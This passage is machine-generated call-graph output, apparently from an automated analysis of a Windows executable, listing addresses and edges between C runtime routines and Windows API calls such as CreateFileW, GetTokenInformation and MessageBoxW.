_invalid_parameter_noinfo 16912->16915 16913 7ff626663c80 37 API calls 16913->16917 16914->16899 16914->16900 16914->16910 16914->16911 16915->16912 16916 7ff6266653ac memcpy_s 37 API calls 16916->16917 16917->16907 16917->16913 16917->16916 16919 7ff626663b83 16918->16919 16920 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16919->16920 16921 7ff626663bae memcpy_s 16919->16921 16920->16921 16921->16841 16923 7ff62665e248 memcpy_s 16922->16923 16924 7ff626654830 45 API calls 16923->16924 16925 7ff62665e302 memcpy_s 16923->16925 16924->16925 16925->16846 16927 7ff62665df9b 16926->16927 16931 7ff62665dfe8 memcpy_s 16926->16931 16928 7ff62665a884 _invalid_parameter_noinfo 37 API calls 16927->16928 16929 7ff62665dfc7 16928->16929 16929->16846 16930 7ff62665e053 16932 7ff62665a514 __std_exception_copy 37 API calls 16930->16932 16931->16930 16933 7ff626654830 45 API calls 16931->16933 16936 7ff62665e095 memcpy_s 16932->16936 16933->16930 16934 7ff62665a970 _isindst 17 API calls 16935 7ff62665e140 16934->16935 16936->16934 16938 7ff626650cbe 16937->16938 16939 7ff626650ccf 16937->16939 16938->16754 16939->16938 16940 7ff62665d66c _fread_nolock 12 API calls 16939->16940 16941 7ff626650d00 16940->16941 16942 7ff626650d14 16941->16942 16943 7ff62665a9b8 __free_lconv_mon 11 API calls 16941->16943 16944 7ff62665a9b8 __free_lconv_mon 11 API calls 16942->16944 16943->16942 16944->16938 16946 7ff6266547d6 16945->16946 16948 7ff6266547de 16945->16948 16947 7ff626654830 45 API calls 16946->16947 16947->16948 16948->16765 16950 7ff62665486f 16949->16950 16951 7ff62665da41 16949->16951 16953 7ff62665da94 16950->16953 16951->16950 16957 7ff626663374 16951->16957 16954 7ff62665daad 16953->16954 16955 7ff62665487f 16953->16955 16954->16955 16992 7ff6266626c0 16954->16992 16955->16687 16969 7ff62665b1c0 GetLastError 16957->16969 16960 7ff6266633ce 16960->16950 16970 7ff62665b1e4 FlsGetValue 16969->16970 16971 7ff62665b201 FlsSetValue 16969->16971 16972 7ff62665b1fb 16970->16972 16989 7ff62665b1f1 16970->16989 16973 7ff62665b213 16971->16973 16971->16989 16972->16971 16975 7ff62665ec08 _get_daylight 11 API calls 16973->16975 16974 7ff62665b26d SetLastError 16976 7ff62665b27a 16974->16976 16977 7ff62665b28d 16974->16977 16978 7ff62665b222 16975->16978 16976->16960 16991 7ff626660348 EnterCriticalSection 16976->16991 16979 7ff62665a574 _CreateFrameInfo 38 API calls 16977->16979 16980 7ff62665b240 FlsSetValue 16978->16980 16981 7ff62665b230 FlsSetValue 16978->16981 16982 7ff62665b292 16979->16982 16984 7ff62665b24c FlsSetValue 16980->16984 16985 7ff62665b25e 16980->16985 16983 7ff62665b239 16981->16983 16987 7ff62665a9b8 __free_lconv_mon 11 API calls 16983->16987 16984->16983 16986 7ff62665af64 _get_daylight 11 API calls 16985->16986 16988 7ff62665b266 16986->16988 16987->16989 16990 7ff62665a9b8 __free_lconv_mon 11 API calls 16988->16990 16989->16974 16990->16974 16993 7ff62665b1c0 _CreateFrameInfo 45 API calls 16992->16993 16994 7ff6266626c9 16993->16994 17001 7ff626666df8 16995->17001 16999 7ff62665f919 MultiByteToWideChar 16998->16999 17004 7ff626666e5c 17001->17004 17002 7ff62664c5c0 _log10_special 8 API calls 17003 7ff62666012d 17002->17003 17003->16788 17004->17002 17006 7ff62665106d 17005->17006 17007 7ff62665107f 17005->17007 17008 7ff626654f78 _get_daylight 11 API calls 17006->17008 17010 7ff62665108d 17007->17010 17013 7ff6266510c9 17007->17013 17009 7ff626651072 17008->17009 17011 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17009->17011 17012 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17010->17012 17017 7ff62665107d 17011->17017 17012->17017 17014 7ff626651445 17013->17014 17016 7ff626654f78 _get_daylight 11 API calls 17013->17016 17015 7ff626654f78 _get_daylight 11 API calls 17014->17015 17014->17017 17018 7ff6266516d9 17015->17018 17019 7ff62665143a 17016->17019 17017->16653 17020 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17018->17020 17021 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17019->17021 17020->17017 17021->17014 17023 7ff626650774 17022->17023 17050 7ff6266504d4 17023->17050 17025 7ff62665078d 17025->16187 17062 7ff62665042c 17026->17062 17030 7ff62664c8c0 17029->17030 17031 7ff626642930 GetCurrentProcessId 17030->17031 17032 7ff626641c80 49 API calls 17031->17032 17033 7ff626642979 17032->17033 17076 7ff6266549f4 17033->17076 17038 7ff626641c80 49 API calls 17039 7ff6266429ff 17038->17039 17106 7ff626642620 17039->17106 17042 7ff62664c5c0 _log10_special 8 API calls 17043 7ff626642a31 17042->17043 17043->16226 17045 7ff626641b89 17044->17045 17046 7ff626650189 17044->17046 17045->16225 17045->16226 17047 7ff626654f78 _get_daylight 11 API calls 17046->17047 17048 7ff62665018e 17047->17048 17049 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17048->17049 17049->17045 17051 7ff62665053e 17050->17051 17052 7ff6266504fe 17050->17052 17051->17052 17054 7ff62665054a 17051->17054 17053 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17052->17053 17055 7ff626650525 17053->17055 17061 7ff6266554dc EnterCriticalSection 17054->17061 17055->17025 17063 7ff626650456 17062->17063 17064 7ff626641a20 17062->17064 17063->17064 17065 7ff6266504a2 17063->17065 17066 7ff626650465 memcpy_s 17063->17066 17064->16195 17064->16196 17075 7ff6266554dc EnterCriticalSection 17065->17075 17069 7ff626654f78 _get_daylight 11 API calls 17066->17069 17071 7ff62665047a 17069->17071 17073 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17071->17073 17073->17064 17077 7ff626654a4e 17076->17077 17078 7ff626654a73 17077->17078 17080 7ff626654aaf 17077->17080 17079 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17078->17079 17082 7ff626654a9d 17079->17082 17115 7ff626652c80 17080->17115 17084 7ff62664c5c0 _log10_special 8 API calls 17082->17084 17083 7ff626654b8c 17085 7ff62665a9b8 __free_lconv_mon 11 API calls 17083->17085 17087 7ff6266429c3 17084->17087 17085->17082 17094 7ff6266551d0 17087->17094 17088 7ff626654bb0 17088->17083 17090 7ff626654bba 17088->17090 17089 7ff626654b61 17091 7ff62665a9b8 __free_lconv_mon 11 API calls 17089->17091 17093 7ff62665a9b8 __free_lconv_mon 11 API calls 17090->17093 17091->17082 17092 7ff626654b58 17092->17083 17092->17089 17093->17082 17095 7ff62665b338 _get_daylight 11 API calls 17094->17095 17096 7ff6266551e7 17095->17096 17097 7ff6266429e5 17096->17097 17098 7ff62665ec08 _get_daylight 11 API calls 17096->17098 17101 7ff626655227 17096->17101 17097->17038 17099 7ff62665521c 17098->17099 17100 7ff62665a9b8 __free_lconv_mon 11 API calls 17099->17100 17100->17101 17101->17097 17253 7ff62665ec90 17101->17253 17104 7ff62665a970 _isindst 17 API calls 17105 7ff62665526c 17104->17105 17107 7ff62664262f 17106->17107 17108 7ff626649400 2 API calls 17107->17108 17109 7ff626642660 17108->17109 17110 7ff62664266f MessageBoxW 17109->17110 17111 7ff626642683 MessageBoxA 17109->17111 17112 7ff626642690 17110->17112 17111->17112 17113 7ff62664c5c0 _log10_special 8 API calls 17112->17113 17114 7ff6266426a0 17113->17114 17114->17042 17116 7ff626652cbe 17115->17116 17117 7ff626652cae 17115->17117 17118 7ff626652cc7 17116->17118 17125 7ff626652cf5 17116->17125 17121 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17117->17121 17119 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17118->17119 17120 7ff626652ced 17119->17120 17120->17083 17120->17088 17120->17089 17120->17092 17121->17120 17122 7ff626654830 45 API calls 17122->17125 17124 7ff626652fa4 17127 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17124->17127 17125->17117 17125->17120 17125->17122 17125->17124 17129 7ff626653610 17125->17129 17155 7ff6266532d8 17125->17155 17185 7ff626652b60 17125->17185 17127->17117 17130 7ff626653652 17129->17130 17131 7ff6266536c5 17129->17131 17132 7ff626653658 17130->17132 17133 7ff6266536ef 17130->17133 17134 7ff6266536ca 17131->17134 17135 7ff62665371f 17131->17135 17140 7ff62665365d 17132->17140 17144 7ff62665372e 17132->17144 17202 7ff626651bc0 17133->17202 17136 7ff6266536cc 17134->17136 17137 7ff6266536ff 17134->17137 17135->17133 17135->17144 17153 7ff626653688 17135->17153 17139 7ff62665366d 17136->17139 17143 7ff6266536db 17136->17143 17209 7ff6266517b0 17137->17209 17154 7ff62665375d 17139->17154 17188 7ff626653f74 17139->17188 17140->17139 17145 7ff6266536a0 17140->17145 17140->17153 17143->17133 17147 7ff6266536e0 17143->17147 17144->17154 17216 7ff626651fd0 17144->17216 17145->17154 17198 7ff626654430 17145->17198 17150 7ff6266545c8 37 API calls 17147->17150 17147->17154 17149 7ff62664c5c0 _log10_special 8 API calls 17151 7ff6266539f3 17149->17151 17150->17153 17151->17125 17153->17154 17223 7ff62665e8c8 17153->17223 17154->17149 17156 7ff6266532f9 17155->17156 17157 7ff6266532e3 17155->17157 17158 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17156->17158 17159 7ff626653337 17156->17159 17157->17159 17160 7ff626653652 17157->17160 17161 7ff6266536c5 17157->17161 17158->17159 17159->17125 17162 7ff626653658 17160->17162 17163 7ff6266536ef 17160->17163 17164 7ff6266536ca 17161->17164 17165 7ff62665371f 17161->17165 17172 7ff62665365d 17162->17172 17175 7ff62665372e 17162->17175 17168 7ff626651bc0 38 API calls 17163->17168 17166 7ff6266536cc 17164->17166 17167 7ff6266536ff 17164->17167 17165->17163 17165->17175 17183 7ff626653688 17165->17183 17169 7ff62665366d 17166->17169 17173 7ff6266536db 17166->17173 17170 7ff6266517b0 38 API calls 17167->17170 17168->17183 17171 7ff626653f74 47 API calls 17169->17171 17184 7ff62665375d 17169->17184 17170->17183 17171->17183 17172->17169 17174 7ff6266536a0 17172->17174 17172->17183 17173->17163 17177 7ff6266536e0 17173->17177 17178 7ff626654430 47 API calls 17174->17178 17174->17184 17176 7ff626651fd0 38 API calls 17175->17176 17175->17184 17176->17183 17180 7ff6266545c8 37 API calls 17177->17180 17177->17184 17178->17183 17179 7ff62664c5c0 _log10_special 8 API calls 17181 7ff6266539f3 17179->17181 17180->17183 17181->17125 17182 7ff62665e8c8 47 API calls 17182->17183 17183->17182 17183->17184 17184->17179 17236 7ff626650d84 17185->17236 17189 7ff626653f96 17188->17189 17190 7ff626650bf0 12 API calls 17189->17190 17191 7ff626653fde 17190->17191 17192 7ff62665e5e0 46 API calls 17191->17192 17193 7ff6266540b1 17192->17193 17194 7ff626654830 45 API calls 17193->17194 17195 7ff6266540d3 17193->17195 17194->17195 17196 7ff626654830 45 API calls 17195->17196 17197 7ff62665415c 17195->17197 17196->17197 17197->17153 17199 7ff626654448 17198->17199 17201 7ff6266544b0 17198->17201 17200 7ff62665e8c8 47 API calls 17199->17200 17199->17201 17200->17201 17201->17153 17203 7ff626651bf3 17202->17203 17204 7ff626651c22 17203->17204 17206 7ff626651cdf 17203->17206 17205 7ff626650bf0 12 API calls 17204->17205 17208 7ff626651c5f 17204->17208 17205->17208 17207 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17206->17207 17207->17208 17208->17153 17210 7ff6266517e3 17209->17210 17211 7ff626651812 17210->17211 17213 7ff6266518cf 17210->17213 17212 7ff626650bf0 12 API calls 17211->17212 17215 7ff62665184f 17211->17215 17212->17215 17214 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17213->17214 17214->17215 17215->17153 17217 7ff626652003 17216->17217 17218 7ff626652032 17217->17218 17220 7ff6266520ef 17217->17220 17219 7ff626650bf0 12 API calls 17218->17219 17222 7ff62665206f 17218->17222 17219->17222 17221 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17220->17221 17221->17222 17222->17153 17224 7ff62665e8f0 17223->17224 17225 7ff626654830 45 API calls 17224->17225 17227 7ff62665e935 17224->17227 17230 7ff62665e91e memcpy_s 17224->17230 17231 7ff62665e8f5 memcpy_s 17224->17231 17225->17227 17226 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17226->17231 17227->17230 17227->17231 17233 7ff626660858 17227->17233 17230->17226 17230->17231 17231->17153 17235 7ff62666087c WideCharToMultiByte 17233->17235 17237 7ff626650dc3 17236->17237 17238 7ff626650db1 17236->17238 17241 7ff626650dd0 17237->17241 17245 7ff626650e0d 17237->17245 17239 7ff626654f78 _get_daylight 11 API calls 17238->17239 17240 7ff626650db6 17239->17240 17242 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17240->17242 17243 7ff62665a884 _invalid_parameter_noinfo 37 API calls 17241->17243 17252 7ff626650dc1 17242->17252 17243->17252 17244 7ff626650eb6 17247 7ff626654f78 _get_daylight 11 API calls 17244->17247 17244->17252 17245->17244 17246 7ff626654f78 _get_daylight 11 API calls 17245->17246 17248 7ff626650eab 17246->17248 17249 7ff626650f60 17247->17249 17250 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17248->17250 17251 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17249->17251 17250->17244 17251->17252 17252->17125 17258 7ff62665ecad 17253->17258 17254 7ff62665ecb2 17255 7ff62665524d 17254->17255 17256 7ff626654f78 _get_daylight 11 API calls 17254->17256 17255->17097 17255->17104 17257 7ff62665ecbc 17256->17257 17259 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17257->17259 17258->17254 17258->17255 17260 7ff62665ecfc 17258->17260 17259->17255 17260->17255 17261 7ff626654f78 _get_daylight 11 API calls 17260->17261 17261->17257 17263 7ff6266487a1 GetTokenInformation 17262->17263 17264 7ff626648823 __vcrt_freefls 17262->17264 17265 7ff6266487cd 17263->17265 17266 7ff6266487c2 GetLastError 17263->17266 17267 7ff62664883c 17264->17267 17268 7ff626648836 CloseHandle 17264->17268 17265->17264 17269 7ff6266487e9 GetTokenInformation 17265->17269 17266->17264 17266->17265 17267->16244 17268->17267 17269->17264 17270 7ff62664880c 17269->17270 17270->17264 17271 7ff626648816 ConvertSidToStringSidW 17270->17271 17271->17264 17273 7ff62664c8c0 17272->17273 17274 7ff626642b74 GetCurrentProcessId 17273->17274 17275 7ff6266426b0 48 API calls 17274->17275 17276 7ff626642bc7 17275->17276 17277 7ff626654c48 48 API calls 17276->17277 17278 7ff626642c10 MessageBoxW 17277->17278 17279 7ff62664c5c0 _log10_special 8 API calls 17278->17279 17280 7ff626642c40 17279->17280 17280->16254 17282 7ff6266425e5 17281->17282 17283 7ff626654c48 48 API calls 17282->17283 17284 7ff626642604 17283->17284 17284->16263 17330 7ff626658804 17285->17330 17289 7ff6266481cc 17288->17289 17290 7ff626649400 2 API calls 17289->17290 17291 7ff6266481eb 17290->17291 17292 7ff626648206 ExpandEnvironmentStringsW 17291->17292 17293 7ff6266481f3 17291->17293 17295 7ff62664822c __vcrt_freefls 17292->17295 17294 7ff626642810 49 API calls 17293->17294 17296 7ff6266481ff __vcrt_freefls 17294->17296 17297 7ff626648230 17295->17297 17299 7ff626648243 17295->17299 17300 7ff62664c5c0 _log10_special 8 API calls 17296->17300 17298 7ff626642810 49 API calls 17297->17298 17298->17296 17302 7ff6266482af 17299->17302 17303 7ff626648251 GetDriveTypeW 17299->17303 17371 7ff6266615c8 17330->17371 17430 7ff626661340 17371->17430 17451 7ff626660348 EnterCriticalSection 17430->17451 17578 7ff62664455a 17577->17578 17579 7ff626649400 2 API calls 17578->17579 17580 7ff62664457f 17579->17580 17581 7ff62664c5c0 _log10_special 8 API calls 17580->17581 17582 7ff6266445a7 17581->17582 17582->16298 17585 7ff626647e1e 17583->17585 17584 7ff626647f42 17587 7ff62664c5c0 _log10_special 8 API calls 17584->17587 17585->17584 17586 7ff626641c80 49 API calls 17585->17586 17590 7ff626647ea5 17586->17590 17588 7ff626647f73 17587->17588 17588->16298 17589 7ff626641c80 49 API calls 17589->17590 17590->17584 17590->17589 17591 7ff626644550 10 API calls 17590->17591 17592 7ff626647efb 17590->17592 17591->17590 17593 7ff626649400 2 API calls 17592->17593 17594 7ff626647f13 CreateDirectoryW 17593->17594 17594->17584 17594->17590 17596 7ff626641637 17595->17596 17597 7ff626641613 17595->17597 17599 7ff6266445b0 108 API calls 17596->17599 17716 7ff626641050 17597->17716 17601 7ff62664164b 17599->17601 17600 7ff626641618 17602 7ff62664162e 17600->17602 17606 7ff626642710 54 API calls 17600->17606 17603 7ff626641653 17601->17603 17604 7ff626641682 17601->17604 17602->16298 17607 7ff626654f78 _get_daylight 11 API calls 17603->17607 17605 7ff6266445b0 108 API calls 17604->17605 17608 7ff626641696 17605->17608 17606->17602 17609 7ff626641658 17607->17609 17611 7ff6266416b8 17608->17611 17612 7ff62664169e 17608->17612 17610 7ff626642910 54 API calls 17609->17610 17613 7ff626641671 17610->17613 17615 7ff626650744 73 API calls 17611->17615 17614 7ff626642710 54 API calls 17612->17614 17613->16298 17616 7ff6266416ae 17614->17616 17617 7ff6266416cd 17615->17617 17622 7ff6266500bc 74 API calls 17616->17622 17618 7ff6266416f9 17617->17618 17619 7ff6266416d1 17617->17619 17644 7ff62664717b 17643->17644 17646 7ff626647134 17643->17646 17644->16298 17646->17644 17780 7ff626655094 17646->17780 17648 7ff626644191 17647->17648 17649 7ff6266444d0 49 API calls 17648->17649 17650 7ff6266441cb 17649->17650 17651 7ff6266444d0 49 API calls 17650->17651 17652 7ff6266441db 17651->17652 17653 7ff6266441fd 17652->17653 17654 7ff62664422c 17652->17654 17811 7ff626644100 17653->17811 17656 7ff626644100 51 API calls 17654->17656 17657 7ff62664422a 17656->17657 17658 7ff626644257 17657->17658 17659 7ff62664428c 17657->17659 17818 7ff626647ce0 17658->17818 17661 7ff626644100 51 API calls 17659->17661 17692 7ff626641c80 49 API calls 17691->17692 17693 7ff626644464 17692->17693 17693->16298 17717 7ff6266445b0 108 API calls 17716->17717 17718 7ff62664108c 17717->17718 17719 7ff6266410a9 17718->17719 17720 7ff626641094 17718->17720 17722 7ff626650744 73 API calls 17719->17722 17721 7ff626642710 54 API calls 17720->17721 17727 7ff6266410a4 __vcrt_freefls 17721->17727 17723 7ff6266410bf 17722->17723 17724 7ff6266410e6 17723->17724 17725 7ff6266410c3 17723->17725 17730 7ff6266410f7 17724->17730 17731 7ff626641122 17724->17731 17726 7ff626654f78 _get_daylight 11 API calls 17725->17726 17727->17600 17732 7ff626654f78 _get_daylight 11 API calls 17730->17732 17733 7ff626641129 17731->17733 17741 7ff62664113c 17731->17741 17781 7ff6266550ce 17780->17781 17782 7ff6266550a1 17780->17782 17783 7ff6266550f1 17781->17783 17786 7ff62665510d 17781->17786 17784 7ff626654f78 _get_daylight 11 API calls 17782->17784 17788 7ff626655058 17782->17788 17785 7ff626654f78 _get_daylight 11 API calls 17783->17785 17787 7ff6266550ab 17784->17787 17789 7ff6266550f6 17785->17789 17795 7ff626654fbc 17786->17795 17791 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17787->17791 17788->17646 17792 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17789->17792 17793 7ff6266550b6 17791->17793 17794 7ff626655101 17792->17794 17793->17646 17794->17646 17796 7ff626654fe0 17795->17796 17802 7ff626654fdb 17795->17802 17797 7ff62665b1c0 _CreateFrameInfo 45 API calls 17796->17797 17796->17802 17798 7ff626654ffb 17797->17798 17803 7ff62665d9f4 17798->17803 17802->17794 17804 7ff62665da09 17803->17804 17806 7ff62665501e 17803->17806 17804->17806 17812 7ff626644126 17811->17812 17813 7ff6266549f4 49 API calls 17812->17813 17814 7ff62664414c 17813->17814 17875 7ff626655f38 17874->17875 17876 7ff626655f5e 17875->17876 17878 7ff626655f91 17875->17878 17877 7ff626654f78 _get_daylight 11 API calls 17876->17877 17879 7ff626655f63 17877->17879 17881 7ff626655f97 17878->17881 17882 7ff626655fa4 17878->17882 17880 7ff62665a950 _invalid_parameter_noinfo 37 API calls 17879->17880 17892 7ff626644606 17880->17892 17883 7ff626654f78 _get_daylight 11 API calls 17881->17883 17893 7ff62665ac98 17882->17893 17883->17892 17892->16332 17906 7ff626660348 EnterCriticalSection 17893->17906 18267 7ff626657968 18266->18267 18270 7ff626657444 18267->18270 18269 7ff626657981 18269->16342 18271 7ff62665748e 18270->18271 18272 7ff62665745f 18270->18272 18280 7ff6266554dc EnterCriticalSection 18271->18280 18273 7ff62665a884 _invalid_parameter_noinfo 37 API calls 18272->18273 18277 7ff62665747f 18273->18277 18277->18269 18282 7ff62664feb3 18281->18282 18285 7ff62664fee1 18281->18285 18283 7ff62665a884 _invalid_parameter_noinfo 37 API calls 18282->18283 18284 7ff62664fed3 18283->18284 18284->16346 18285->18284 18291 7ff6266554dc EnterCriticalSection 18285->18291 18293 7ff62664cb62 RtlLookupFunctionEntry 18292->18293 18294 7ff62664cb78 RtlVirtualUnwind 18293->18294 18295 7ff62664c97b 18293->18295 18294->18293 18294->18295 18296 7ff62664c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18295->18296 18298 7ff6266445b0 108 API calls 18297->18298 18299 7ff626641493 18298->18299 18300 7ff6266414bc 18299->18300 18301 7ff62664149b 18299->18301 18303 7ff626650744 73 API calls 18300->18303 18302 7ff626642710 54 API calls 18301->18302 18304 7ff6266414ab 18302->18304 18305 7ff6266414d1 18303->18305 18304->16388 18306 7ff6266414f8 18305->18306 18307 7ff6266414d5 18305->18307 18404 7ff626646365 18403->18404 18405 7ff626641c80 49 API calls 18404->18405 18406 7ff6266463a1 18405->18406 18407 7ff6266463cd 18406->18407 18408 7ff6266463aa 18406->18408 18410 7ff626644620 49 API calls 18407->18410 18409 7ff626642710 54 API calls 18408->18409 18411 7ff6266463c3 18409->18411 18412 7ff6266463e5 18410->18412 18416 7ff62664c5c0 _log10_special 8 API calls 18411->18416 18413 7ff626646403 18412->18413 18414 7ff626642710 54 API calls 18412->18414 18415 7ff626644550 10 API calls 18413->18415 18414->18413 18417 7ff62664640d 18415->18417 18418 7ff62664336e 18416->18418 18419 7ff62664641b 18417->18419 18420 7ff626649070 3 API calls 18417->18420 18418->16456 18434 7ff6266464f0 18418->18434 18420->18419 18583 7ff6266453f0 18434->18583 18693 7ff62665b1c0 _CreateFrameInfo 45 API calls 18692->18693 18694 7ff62665a451 18693->18694 18697 7ff62665a574 18694->18697 18706 7ff6266636c0 18697->18706 18732 7ff626663678 18706->18732 18737 7ff626660348 EnterCriticalSection 18732->18737 18741 7ff626655698 18742 7ff6266556b2 18741->18742 18743 7ff6266556cf 18741->18743 18744 7ff626654f58 _fread_nolock 11 API calls 18742->18744 18743->18742 18745 7ff6266556e2 CreateFileW 18743->18745 18746 7ff6266556b7 18744->18746 18747 7ff62665574c 18745->18747 18748 7ff626655716 18745->18748 18749 7ff626654f78 _get_daylight 11 API calls 18746->18749 18792 7ff626655c74 18747->18792 18766 7ff6266557ec GetFileType 18748->18766 18753 7ff6266556bf 18749->18753 18757 7ff62665a950 _invalid_parameter_noinfo 37 API calls 18753->18757 18755 7ff626655755 18760 7ff626654eec _fread_nolock 11 API calls 18755->18760 18756 7ff626655780 18813 7ff626655a34 18756->18813 18762 7ff6266556ca 18757->18762 18758 7ff62665572b CloseHandle 18758->18762 18759 7ff626655741 CloseHandle 18759->18762 18765 7ff62665575f 18760->18765 18765->18762 18767 7ff62665583a 18766->18767 18768 7ff6266558f7 18766->18768 18769 7ff626655866 GetFileInformationByHandle 18767->18769 18776 7ff626655b70 21 API calls 18767->18776 18770 7ff6266558ff 18768->18770 18771 7ff626655921 18768->18771 18772 7ff626655912 GetLastError 18769->18772 18773 7ff62665588f 18769->18773 18770->18772 18774 7ff626655903 18770->18774 18775 7ff626655944 PeekNamedPipe 18771->18775 18790 7ff6266558e2 18771->18790 18779 7ff626654eec _fread_nolock 11 API calls 18772->18779 18777 7ff626655a34 51 API calls 18773->18777 18778 7ff626654f78 _get_daylight 11 API calls 18774->18778 18775->18790 18782 7ff626655854 18776->18782 18780 7ff62665589a 18777->18780 18778->18790 18779->18790 18830 7ff626655994 18780->18830 18781 7ff62664c5c0 _log10_special 8 API calls 18784 7ff626655724 18781->18784 18782->18769 18782->18790 18784->18758 18784->18759 18786 7ff626655994 10 API calls 18787 7ff6266558b9 18786->18787 18788 7ff626655994 10 API calls 18787->18788 18789 7ff6266558ca 18788->18789 18789->18790 18791 7ff626654f78 _get_daylight 11 API calls 18789->18791 18790->18781 18791->18790 18793 7ff626655caa 18792->18793 18794 7ff626654f78 _get_daylight 11 API calls 18793->18794 18812 7ff626655d42 __vcrt_freefls 18793->18812 18796 7ff626655cbc 18794->18796 18795 7ff62664c5c0 _log10_special 8 API calls 18797 7ff626655751 18795->18797 18798 7ff626654f78 _get_daylight 11 API calls 18796->18798 18797->18755 18797->18756 18799 7ff626655cc4 18798->18799 18800 7ff626657e78 45 API calls 18799->18800 18801 7ff626655cd9 18800->18801 18802 7ff626655ceb 18801->18802 18803 7ff626655ce1 18801->18803 18805 7ff626654f78 _get_daylight 11 API calls 18802->18805 18804 7ff626654f78 _get_daylight 11 API calls 18803->18804 18809 7ff626655ce6 18804->18809 18806 7ff626655cf0 18805->18806 18807 7ff626654f78 _get_daylight 11 API calls 18806->18807 18806->18812 18808 7ff626655cfa 18807->18808 18810 7ff626657e78 45 API calls 18808->18810 18811 7ff626655d34 GetDriveTypeW 18809->18811 18809->18812 18810->18809 18811->18812 18812->18795 18815 7ff626655a5c 18813->18815 18814 7ff62665578d 18823 7ff626655b70 18814->18823 18815->18814 18837 7ff62665f794 18815->18837 18817 7ff626655af0 18817->18814 18818 7ff62665f794 51 API calls 18817->18818 18819 7ff626655b03 18818->18819 18819->18814 18820 7ff62665f794 51 API calls 18819->18820 18821 7ff626655b16 18820->18821 18821->18814 18822 7ff62665f794 51 API calls 18821->18822 18822->18814 18824 7ff626655b8a 18823->18824 18825 7ff626655bc1 18824->18825 18826 7ff626655b9a 18824->18826 18827 7ff62665f628 21 API calls 18825->18827 18828 7ff626654eec _fread_nolock 11 API calls 18826->18828 18829 7ff626655baa 18826->18829 18827->18829 18828->18829 18829->18765 18831 7ff6266559bd FileTimeToSystemTime 18830->18831 18832 7ff6266559b0 18830->18832 18833 7ff6266559d1 SystemTimeToTzSpecificLocalTime 18831->18833 18834 7ff6266559b8 18831->18834 18832->18831 18832->18834 18833->18834 18835 7ff62664c5c0 _log10_special 8 API calls 18834->18835 18836 7ff6266558a9 18835->18836 18836->18786 18838 7ff62665f7c5 18837->18838 18839 7ff62665f7a1 18837->18839 18841 7ff62665f7ff 18838->18841 18844 7ff62665f81e 18838->18844 18839->18838 18840 7ff62665f7a6 18839->18840 18842 7ff626654f78 _get_daylight 11 API calls 18840->18842 18843 7ff626654f78 _get_daylight 11 API calls 18841->18843 18845 7ff62665f7ab 18842->18845 18846 7ff62665f804 18843->18846 18847 7ff626654fbc 45 API calls 18844->18847 18848 7ff62665a950 _invalid_parameter_noinfo 37 API calls 18845->18848 18849 7ff62665a950 _invalid_parameter_noinfo 37 API calls 18846->18849 18853 7ff62665f82b 18847->18853 18850 7ff62665f7b6 18848->18850 18852 7ff62665f80f 18849->18852 18850->18817 18851 7ff62666054c 51 API calls 18851->18853 18852->18817 18853->18851 18853->18852 20255 7ff626661720 20266 7ff626667454 20255->20266 20267 7ff626667461 20266->20267 20268 7ff62665a9b8 __free_lconv_mon 11 API calls 20267->20268 20269 7ff62666747d 20267->20269 20268->20267 20270 7ff62665a9b8 __free_lconv_mon 11 API calls 20269->20270 20271 7ff626661729 20269->20271 20270->20269 20272 7ff626660348 EnterCriticalSection 20271->20272 18980 7ff62665c590 18991 7ff626660348 EnterCriticalSection 18980->18991 19703 7ff62665f9fc 19704 7ff62665fbee 19703->19704 19707 7ff62665fa3e _isindst 19703->19707 19705 7ff626654f78 _get_daylight 11 API calls 19704->19705 19706 7ff62665fbde 19705->19706 19708 7ff62664c5c0 _log10_special 8 API calls 19706->19708 19707->19704 19710 7ff62665fabe _isindst 19707->19710 19709 7ff62665fc09 19708->19709 19724 7ff626666204 19710->19724 19715 7ff62665fc1a 19717 7ff62665a970 _isindst 17 API calls 19715->19717 19719 7ff62665fc2e 19717->19719 19722 7ff62665fb1b 19722->19706 19749 7ff626666248 19722->19749 19725 7ff626666213 19724->19725 19726 7ff62665fadc 19724->19726 19756 7ff626660348 EnterCriticalSection 19725->19756 19731 7ff626665608 19726->19731 19732 7ff62665faf1 19731->19732 19733 7ff626665611 19731->19733 19732->19715 19737 7ff626665638 19732->19737 19734 7ff626654f78 _get_daylight 11 API calls 19733->19734 19735 7ff626665616 19734->19735 19736 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19735->19736 19736->19732 19738 7ff62665fb02 19737->19738 19739 7ff626665641 19737->19739 19738->19715 19743 7ff626665668 19738->19743 19740 7ff626654f78 _get_daylight 11 API calls 19739->19740 19741 7ff626665646 19740->19741 19742 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19741->19742 19742->19738 19744 7ff62665fb13 19743->19744 19745 7ff626665671 19743->19745 19744->19715 19744->19722 19746 7ff626654f78 _get_daylight 11 API calls 19745->19746 19747 7ff626665676 19746->19747 19748 7ff62665a950 _invalid_parameter_noinfo 37 API calls 19747->19748 19748->19744 19757 7ff626660348 EnterCriticalSection 19749->19757 20103 7ff626655480 20104 7ff62665548b 20103->20104 20112 7ff62665f314 20104->20112 20125 7ff626660348 EnterCriticalSection 20112->20125 20130 7ff62666ae6e 20131 7ff62666ae7d 20130->20131 20132 7ff62666ae87 20130->20132 20134 7ff6266603a8 LeaveCriticalSection 20131->20134 19772 7ff62666add9 19775 7ff6266554e8 LeaveCriticalSection 19772->19775 20136 7ff62666ac53 20137 